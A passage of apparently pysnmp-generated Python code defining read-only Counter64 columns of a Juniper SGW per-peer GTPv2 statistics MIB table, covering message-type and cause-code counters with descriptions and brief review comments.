if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessReqTx.setDescription('Number of GTP V2 Create Session Requests Sent.')
jnxMbgSgwPPCreateSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessRspRx.setDescription('Number of GTP V2 Create Session Responses received.')
jnxMbgSgwPPCreateSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCreateSessRspTx.setDescription('Number of GTP V2 Create Session Responses Sent.')
jnxMbgSgwPPModBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 30), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrReqRx.setDescription('Number of GTP V2 Modify Bearer Requests received.')
jnxMbgSgwPPModBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 31), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrReqTx.setDescription('Number of GTP V2 Modify Bearer Requests Sent.')
jnxMbgSgwPPModBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 32), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrRspRx.setDescription('Number of GTP V2 Modify Bearer Responses received.')
jnxMbgSgwPPModBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 33), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrRspTx.setDescription('Number of GTP V2 Modify Bearer Responses Sent.')
jnxMbgSgwPPDelSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 34), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessReqRx.setDescription('Number of GTP V2 Delete Session Requests received.')
jnxMbgSgwPPDelSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 35), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessReqTx.setDescription('Number of GTP V2 Delete Session Requests Sent.')
jnxMbgSgwPPDelSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 36), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessRspRx.setDescription('Number of GTP V2 Delete Session Responses received.')
jnxMbgSgwPPDelSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 37), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessRspTx.setDescription('Number of GTP V2 Delete Session Responses Sent.')
jnxMbgSgwPPCrtBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 38), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrReqRx.setDescription('Number of GTP V2 Create Bearer Requests received.')
jnxMbgSgwPPCrtBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 39), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrReqTx.setDescription('Number of GTP V2 Create Bearer Requests Sent.')
jnxMbgSgwPPCrtBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 40), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrRspRx.setDescription('Number of GTP V2 Create Bearer Response received.')
jnxMbgSgwPPCrtBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 41), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrRspTx.setDescription('Number of GTP V2 Create Bearer Response Sent.')
jnxMbgSgwPPUpdBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 42), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrReqRx.setDescription('Number of GTP V2 Update Bearer Request received.')
jnxMbgSgwPPUpdBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 43), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrReqTx.setDescription('Number of GTP V2 Update Bearer Request Sent.')
jnxMbgSgwPPUpdBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 44), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrRspRx.setDescription('Number of GTP V2 Update Bearer Response received.')
jnxMbgSgwPPUpdBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 45), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrRspTx.setDescription('Number of GTP V2 Update Bearer Response Sent.')
jnxMbgSgwPPDelBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 46), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrReqRx.setDescription('Number of GTP V2 Delete Bearer Request received.')
jnxMbgSgwPPDelBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 47), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrReqTx.setDescription('Number of GTP V2 Delete Bearer Request Sent.')
jnxMbgSgwPPDelBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 48), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrRspRx.setDescription('Number of GTP V2 Delete Bearer Response received.')
# --------------------------------------------------------------------------
# Columns of the SGW per-peer GTP statistics table: one Counter64 column per
# GTPv2 message type (Rx/Tx pairs) or per GTPv2 cause code, each registered
# under OID prefix 1.3.6.1.4.1.2636.3.66.2.2.1.1.1.<column-index>.
# NOTE(review): this looks like pysnmp auto-generated MIB code (the
# `if mibBuilder.loadTexts:` guards attach human-readable status/description
# text only when display texts are loaded) — prefer regenerating from the
# Juniper MIB source over hand-editing. Typos such as 'Symantic' and
# 'Indicaton' in the description strings mirror the upstream MIB text and
# are deliberately left untouched.
# --------------------------------------------------------------------------

# --- GTPv2 signalling message counters (columns 49-89): received/sent
#     totals per message type on the SGW peer interface. ---
jnxMbgSgwPPDelBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 49), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrRspTx.setDescription('Number of GTP V2 Delete Bearer Response Sent.')
jnxMbgSgwPPDelConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 50), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetReqRx.setDescription('Number of GTP V2 Delete PDN connection set Request received.')
jnxMbgSgwPPDelConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 51), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetReqTx.setDescription('Number of GTP V2 Delete PDN connection set Request Sent.')
jnxMbgSgwPPDelConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 52), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetRspRx.setDescription('Number of GTP V2 Delete PDN connection set Response received.')
jnxMbgSgwPPDelConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 53), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetRspTx.setDescription('Number of GTP V2 Delete PDN connection set Response Sent.')
jnxMbgSgwPPUpdConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 54), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetReqRx.setDescription('Number of GTP V2 Update Connection set Request received.')
jnxMbgSgwPPUpdConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 55), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetReqTx.setDescription('Number of GTP V2 Update Connection set Request Sent.')
jnxMbgSgwPPUpdConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 56), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetRspRx.setDescription('Number of GTP V2 Update Connection set Response received.')
jnxMbgSgwPPUpdConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 57), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetRspTx.setDescription('Number of GTP V2 Update Connection set Response Sent.')
jnxMbgSgwPPModBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 58), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrCmdRx.setDescription('Number of GTP V2 Modify Bearer Command received.')
jnxMbgSgwPPModBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 59), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrCmdTx.setDescription('Number of GTP V2 Modify Bearer Command Sent.')
jnxMbgSgwPPModBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 60), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrFlrIndRx.setDescription('Number of GTP V2 Modify Bearer Failure received.')
jnxMbgSgwPPModBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 61), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrFlrIndTx.setDescription('Number of GTP V2 Modify Bearer Failure Sent.')
jnxMbgSgwPPDelBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 62), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrCmdRx.setDescription('Number of GTP V2 Delete Bearer Command received.')
jnxMbgSgwPPDelBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 63), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrCmdTx.setDescription('Number of GTP V2 Delete Bearer Command Sent.')
jnxMbgSgwPPDelBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 64), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrFlrIndRx.setDescription('Number of GTP V2 Delete Bearer Failure received.')
jnxMbgSgwPPDelBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 65), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrFlrIndTx.setDescription('Number of GTP V2 Delete Bearer Failure Sent.')
jnxMbgSgwPPBrResCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 66), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPBrResCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPBrResCmdRx.setDescription('Number of GTP V2 Bearer Response Command received.')
jnxMbgSgwPPBrResCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 67), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPBrResCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPBrResCmdTx.setDescription('Number of GTP V2 Bearer Response Command Sent.')
jnxMbgSgwPPBrResFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 68), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPBrResFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPBrResFlrIndRx.setDescription('Number of GTP V2 Bearer Resource Failure received.')
jnxMbgSgwPPBrResFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 69), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPBrResFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPBrResFlrIndTx.setDescription('Number of GTP V2 Bearer Resource Failure Sent.')
jnxMbgSgwPPRelAcsBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 70), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrReqRx.setDescription('Number of GTP V2 Release Access Bearer Requests received.')
jnxMbgSgwPPRelAcsBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 71), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrReqTx.setDescription('Number of GTP V2 Release Access Bearer Requests sent.')
jnxMbgSgwPPRelAcsBrRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 72), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrRespRx.setDescription('Number of GTP V2 Release Access Bearer Response received.')
jnxMbgSgwPPRelAcsBrRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 73), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrRespTx.setDescription('Number of GTP V2 Release Access Bearer Response sent.')
jnxMbgSgwPPCrIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 74), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunReqRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request Received')
jnxMbgSgwPPCrIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 75), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunReqTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request sent')
jnxMbgSgwPPCrIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 76), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunRespRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response Received')
jnxMbgSgwPPCrIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 77), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunRespTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response sent')
jnxMbgSgwPPDelIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 78), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunReqRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request Received')
jnxMbgSgwPPDelIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 79), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunReqTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request sent.')
jnxMbgSgwPPDelIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 80), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunRespRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response Received')
jnxMbgSgwPPDelIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 81), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunRespTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response sent.')
jnxMbgSgwPPDlDataNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 82), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotifRx.setDescription('Number of GTP V2 Downlink Data Notify received.')
jnxMbgSgwPPDlDataNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 83), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotifTx.setDescription('Number of GTP V2 Downlink Data Notify Sent.')
jnxMbgSgwPPDlDataAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 84), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataAckRx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement received.')
jnxMbgSgwPPDlDataAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 85), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataAckTx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement Sent.')
jnxMbgSgwPPDlDataNotiFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 86), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotiFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotiFlrIndRx.setDescription('Number of GTP V2 Downlink Data Notification fail received.')
jnxMbgSgwPPDlDataNotiFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 87), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotiFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotiFlrIndTx.setDescription('Number of GTP V2 Downlink Data Notification fail Sent.')
jnxMbgSgwPPStopPagingIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 88), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPStopPagingIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPStopPagingIndRx.setDescription('Number of GTP V2 Number of Stop Paging Indication Messages Received.')
jnxMbgSgwPPStopPagingIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 89), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPStopPagingIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPStopPagingIndTx.setDescription('Number of GTP V2 Number of Stop Paging Indicaton messages sent')
# --- GTPv2 cause-code counters (columns 90 onward): packets received/sent
#     broken down by the cause value carried in the message.
#     NOTE: the two Page-cause columns immediately below carry status
#     'obsolete' in the MIB, unlike their 'current' siblings. ---
jnxMbgSgwPPGtpV2ICsPageRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 90), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPageRx.setStatus('obsolete')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPageRx.setDescription('Number of GTPV2 packets received with cause Page.')
jnxMbgSgwPPGtpV2ICsPageTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 91), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPageTx.setStatus('obsolete')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPageTx.setDescription('Number of GTP packets sent with cause Page.')
jnxMbgSgwPPGtpV2ICsReqAcceptRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 92), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqAcceptRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqAcceptRx.setDescription('Number of GTPV2 packets received with cause Request Accept.')
jnxMbgSgwPPGtpV2ICsReqAcceptTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 93), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqAcceptTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqAcceptTx.setDescription('Number of GTP packets sent with cause Request Accept.')
jnxMbgSgwPPGtpV2ICsAcceptPartRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 94), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAcceptPartRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAcceptPartRx.setDescription('Number of GTPV2 packets received with cause Accept Partial.')
jnxMbgSgwPPGtpV2ICsAcceptPartTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 95), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAcceptPartTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAcceptPartTx.setDescription('Number of GTP packets sent with cause Accept Partial.')
jnxMbgSgwPPGtpV2ICsNewPTNPrefRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 96), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNewPTNPrefRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNewPTNPrefRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Network Preference.')
jnxMbgSgwPPGtpV2ICsNewPTNPrefTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 97), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNewPTNPrefTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNewPTNPrefTx.setDescription('Number of GTP packets sent with cause New PDN type due to Network Preference.')
jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 98), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx.setStatus('current')
